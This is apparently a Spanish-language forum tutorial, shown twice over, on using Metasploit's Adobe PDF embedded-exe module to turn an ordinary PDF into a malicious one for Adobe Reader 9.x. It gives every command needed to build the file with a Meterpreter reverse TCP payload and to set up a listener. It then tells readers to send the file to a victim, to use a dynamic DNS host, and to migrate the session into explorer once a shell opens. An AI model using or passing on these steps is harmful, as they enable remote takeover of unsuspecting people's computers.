Muy buenas,
Aún y que esto ya está corregido en versiones posteriores a la 9.x todavía es factible su uso...
Vamos a crear un pdf infectado utilizando nuestro amigo metasploit...
Crearemos una conexión de la víctima a nosotros, aumentando en cierta medida el éxito de este ataque, puesto que conexiones externas suelen ser rechazadas por el firewall...
Abriremos una terminal y tecleamos:
Una vez cargado metasploit:
Este exploit nos ejecutará el PAYLOAD cuando la víctima abra el PDF... Vamos a darle a metasploit el nombre que tendrá nuestro PDF infectado:
Ahora le indicamos el directorio del fichero PDF original a infectar, en mi caso:
Indicamos a metasploit el directorio de salida con:
Vamos a cargar el PAYLOAD a utilizar, en nuestro caso un reverse_tcp:
Ok, configuramos ahora nuestra ip (mejor utilizar un NO-ip o similares, ya saben...)
Indicamos el puerto...
Y configuramos el S.O y versión de Adobe Reader:
Ahora toca hacer el exploit...
Dejaremos el exploit de lado para ponernos a la espera de nuestro PAYLOAD. Para ello:
Nos pondremos a la escucha usando:
Le indicamos el PAYLOAD:
Vamos a indicarle nuestra ip así como el puerto a la escucha:
Indicamos id=0:
Finalmente...
Enviamos nuestro archivo pdf infectado a una víctima, en nuestro caso un Windows XP SP2 y al abrirlo... Se hizo la luz!
Una vez aquí... cada uno que haga lo que quiera, lo suyo seria migrar a explorer etc..
Lo siento Sergi...
Saludos!
. _ ; _ _ . _ ; _ _ . _ ; . _ . . ; .
Aún y que esto ya está corregido en versiones posteriores a la 9.x todavía es factible su uso...
Vamos a crear un pdf infectado utilizando nuestro amigo metasploit...
Crearemos una conexión de la víctima a nosotros, aumentando en cierta medida el éxito de este ataque, puesto que conexiones externas suelen ser rechazadas por el firewall...
Abriremos una terminal y tecleamos:
Código [Seleccionar]
msfconsole #quizá tengáis que usar sudo msfconsole...
Una vez cargado metasploit:
Código [Seleccionar]
use exploit/windows/fileformat/adobe_pdf_embedded_exe
Este exploit nos ejecutará el PAYLOAD cuando la víctima abra el PDF... Vamos a darle a metasploit el nombre que tendrá nuestro PDF infectado:
Código [Seleccionar]
set FILENAME aqqle.pdf
Ahora le indicamos el directorio del fichero PDF original a infectar, en mi caso:
Código [Seleccionar]
set INFILENAME /home/bugtraq/Hacking/Manuales/mitm.pdf
Indicamos a metasploit el directorio de salida con:
Código [Seleccionar]
set OUTPUTPATH /home/bugtraq/
Vamos a cargar el PAYLOAD a utilizar, en nuestro caso un reverse_tcp:
Código [Seleccionar]
set PAYLOAD windows/meterpreter/reverse_tcp
Ok, configuramos ahora nuestra ip (mejor utilizar un NO-ip o similares, ya saben...)
Código [Seleccionar]
set LHOST 192.168.0.199
Indicamos el puerto...
Código [Seleccionar]
set LPORT 4455
Y configuramos el S.O y versión de Adobe Reader:
Código [Seleccionar]
set id 0
Ahora toca hacer el exploit...
Código [Seleccionar]
exploit
Dejaremos el exploit de lado para ponernos a la espera de nuestro PAYLOAD. Para ello:
Código [Seleccionar]
back
Nos pondremos a la escucha usando:
Código [Seleccionar]
use exploit/multi/handler
Le indicamos el PAYLOAD:
Código [Seleccionar]
set PAYLOAD windows/meterpreter/reverse_tcp
Vamos a indicarle nuestra ip así como el puerto a la escucha:
Código [Seleccionar]
set LHOST 192.168.0.199
Código [Seleccionar]
set LPORT 4455
Indicamos id=0:
Código [Seleccionar]
set id 0
Finalmente...
Código [Seleccionar]
exploit
Enviamos nuestro archivo pdf infectado a una víctima, en nuestro caso un Windows XP SP2 y al abrirlo... Se hizo la luz!
Una vez aquí... cada uno que haga lo que quiera, lo suyo seria migrar a explorer etc..
Lo siento Sergi...
Saludos!
. _ ; _ _ . _ ; _ _ . _ ; . _ . . ; .